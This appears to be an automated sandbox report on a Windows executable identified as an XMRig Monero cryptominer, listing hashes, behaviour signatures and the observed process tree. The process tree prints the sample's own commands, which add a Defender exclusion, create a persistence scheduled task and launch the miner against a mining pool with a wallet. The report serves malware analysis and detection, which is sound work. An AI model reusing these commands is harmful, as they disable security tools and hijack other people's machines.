Analysis

  • max time kernel
    93s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-12-2022 20:13

General

  • Target

    e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe

  • Size

    2.0MB

  • MD5

    458aea46c863b50682715900a848ff26

  • SHA1

    77cd33d12812df7c50bee28a234f9880d8ad2498

  • SHA256

    e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10

  • SHA512

    ec4732d7fc1d961f218f9c19d75f3aea633cb468b400df6fe009f9a5c27c344a1b4790a5422838ff4b8aef0cf9b1bb241d3b6aaeaf2b8f762055a4d09e7d903d

  • SSDEEP

    49152:28DkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3g3jkl83wdS8P+8Vv9:2okfRX4UTDennUI3g34lmi

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe
    "C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2336
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3492
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4052
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3508
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 432 -s 3832
      2⤵
      • Program crash
      PID:4424
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 436 -p 432 -ip 432
    1⤵
      PID:4312

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/432-153-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/432-138-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/432-169-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/432-136-0x00007FFC15720000-0x00007FFC157DD000-memory.dmp

      Filesize

      756KB

    • memory/432-137-0x00007FFC31270000-0x00007FFC31411000-memory.dmp

      Filesize

      1.6MB

    • memory/432-139-0x00000000009E0000-0x0000000000C50000-memory.dmp

      Filesize

      2.4MB

    • memory/432-140-0x0000000000600000-0x0000000000643000-memory.dmp

      Filesize

      268KB

    • memory/432-168-0x00000000009E0000-0x0000000000C50000-memory.dmp

      Filesize

      2.4MB

    • memory/432-141-0x00007FFC30E40000-0x00007FFC30E6B000-memory.dmp

      Filesize

      172KB

    • memory/432-142-0x00000000009E0000-0x0000000000C50000-memory.dmp

      Filesize

      2.4MB

    • memory/432-143-0x00000000009E0000-0x0000000000C50000-memory.dmp

      Filesize

      2.4MB

    • memory/432-144-0x00007FFC155D0000-0x00007FFC1571E000-memory.dmp

      Filesize

      1.3MB

    • memory/432-133-0x00007FFC157E0000-0x00007FFC1588A000-memory.dmp

      Filesize

      680KB

    • memory/432-146-0x00007FFC30AF0000-0x00007FFC30B17000-memory.dmp

      Filesize

      156KB

    • memory/432-167-0x00007FFC0FCA0000-0x00007FFC0FE0A000-memory.dmp

      Filesize

      1.4MB

    • memory/432-159-0x00007FFC2F5C0000-0x00007FFC2F5FB000-memory.dmp

      Filesize

      236KB

    • memory/432-158-0x00007FFC32780000-0x00007FFC327EB000-memory.dmp

      Filesize

      428KB

    • memory/432-157-0x00007FFC0FEB0000-0x00007FFC0FFB2000-memory.dmp

      Filesize

      1.0MB

    • memory/432-151-0x0000000000600000-0x0000000000643000-memory.dmp

      Filesize

      268KB

    • memory/432-152-0x00000000009E0000-0x0000000000C50000-memory.dmp

      Filesize

      2.4MB

    • memory/432-145-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/432-134-0x00007FFC327F0000-0x00007FFC3288E000-memory.dmp

      Filesize

      632KB

    • memory/432-135-0x00007FFC2E110000-0x00007FFC2E122000-memory.dmp

      Filesize

      72KB

    • memory/432-156-0x00007FFC0FE70000-0x00007FFC0FEA5000-memory.dmp

      Filesize

      212KB

    • memory/2336-149-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/2336-148-0x00000221FF100000-0x00000221FF122000-memory.dmp

      Filesize

      136KB

    • memory/2336-147-0x0000000000000000-mapping.dmp

    • memory/2336-150-0x00007FFC13E80000-0x00007FFC14941000-memory.dmp

      Filesize

      10.8MB

    • memory/3492-154-0x0000000000000000-mapping.dmp

    • memory/3508-174-0x00000208D25D0000-0x00000208D25F0000-memory.dmp

      Filesize

      128KB

    • memory/3508-163-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/3508-162-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/3508-161-0x0000000140343234-mapping.dmp

    • memory/3508-160-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/3508-166-0x00000208D2450000-0x00000208D2490000-memory.dmp

      Filesize

      256KB

    • memory/3508-164-0x00000208D2400000-0x00000208D2420000-memory.dmp

      Filesize

      128KB

    • memory/3508-170-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/3508-171-0x00000208D25B0000-0x00000208D25D0000-memory.dmp

      Filesize

      128KB

    • memory/3508-172-0x00000208D25D0000-0x00000208D25F0000-memory.dmp

      Filesize

      128KB

    • memory/3508-173-0x00000208D25B0000-0x00000208D25D0000-memory.dmp

      Filesize

      128KB

    • memory/3508-165-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/4052-155-0x0000000000000000-mapping.dmp